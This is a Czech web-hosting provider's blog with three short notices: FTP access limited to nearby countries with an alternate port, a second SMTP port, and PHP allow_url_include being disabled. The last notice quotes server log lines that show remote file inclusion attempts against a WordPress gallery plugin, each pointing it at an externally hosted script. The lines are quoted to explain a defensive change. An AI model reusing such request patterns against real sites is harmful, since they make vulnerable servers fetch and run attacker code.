Online Hosting - blog » Konfigurace a nastavení

Zavedli jsme filtraci FTP – připojit se lze jen z Česka a dalších okolních zemí

admin — Mon, 08 Jun 2009 14:13:58 +0000

Vzhledem ke stále častějším útokům ze zahraničí na webové stránky skrz ftp účet, jsme provedli následující opatření. Na ftp účet se lze nyní připojit standardní cestou (tj. na port 21) jen z Česka, Slovenska, Německa, Rakouska a Polska.

Pro ty z vás, kteří se potřebují připojovat ze zahraničí, jsme zřídili extra port 10021, který není filtrovaný a umožňuje připojení odkudkoliv.

Pokud se tedy chcete připojit na ftp ze zahraničí, stačí v Total Commanderu zadat jako hostitele vase_domena.cz:10021.

Pokud byste se nemohli připojit a zároveň byste byli za proxy serverem nebo firewallem, který neumožňuje připojení k ftp na jiný port než 21, kontaktujte nás. Povolíme vám přístup z konkrétní IP adresy.

Služba Webftp (webový přístup k FTP) tímto dotčená není. Přes ni se lze připojit odkudkoliv. Prozatím se filtrace týká webhostingu Online.

Druhý smtp port pro odesílání pošty

admin — Mon, 01 Jun 2009 14:16:52 +0000

Jelikož stále více wifi poskytovatelů, hotelů apod. blokují odesílání pošty přes standardní smtp port 25, zprovoznili jsme druhý port pro odesílání pošty, a to 10025.

Často se k těmto sítím připojují zavirované počítače rozesílající tisíce spamů denně, tím se jednak poskytovatel dostává rychle na spamový blacklist (které na našem emailserveru také používáme), a zároveň také rapidně zpomaluje rychlost internetu. Proto se mnoho poskytovatelů uchyluje k filtrování odchozích připojení na port 25, a tím pádem nelze přes náš smtp server odesílat poštu.

Zakázali jsme u funkcí include a require načítání zdrojového kódu z cizích webserverů

admin — Mon, 08 Dec 2008 21:52:43 +0000

Z důvodu nárůstu útoků na webové aplikace jsme na všech serverech zakázali u funkce Include a Require načtení zdrojového souboru z cizího webové serveru, tj. přes http nebo ftp. Na funkce fopen() by tato změna neměla mít vliv. Pokud byste potřebovali nahrávat věci z cizího serveru, použijte buď již zmiňovanou funkci fopen() nebo file_get_contents().

Zákaz jsme provedli přes direktivu allow_url_include = Off.

A jak takový útok např. může vypadat? Ukázka z logu – komentář snad netřeba:

xxxx.cz 80.254.74.63 - - [08/Dec/2008:18:11:18 +0100] "GET /?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1" 200 229 "-" "Mozilla/3.0 (compatible; Indy Library)"

xxxx.cz 80.254.74.63 – - [08/Dec/2008:18:11:14 +0100] „GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 „-“ „Mozilla/3.0 (compatible; Indy Library)“

xxxx.cz 80.254.74.63 – - [08/Dec/2008:18:14:33 +0100] „GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.freewebs.com/albalbo/xx.txt?? HTTP/1.1″ 200 229 „-“ „Mozilla/3.0 (compatible; Indy Library)“

xxxx.cz 76.162.254.213 – - [08/Dec/2008:18:58:40 +0100] „GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pastebin.linode.com/?dl=1581??? HTTP/1.1″ 200 227 „-“ „Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1″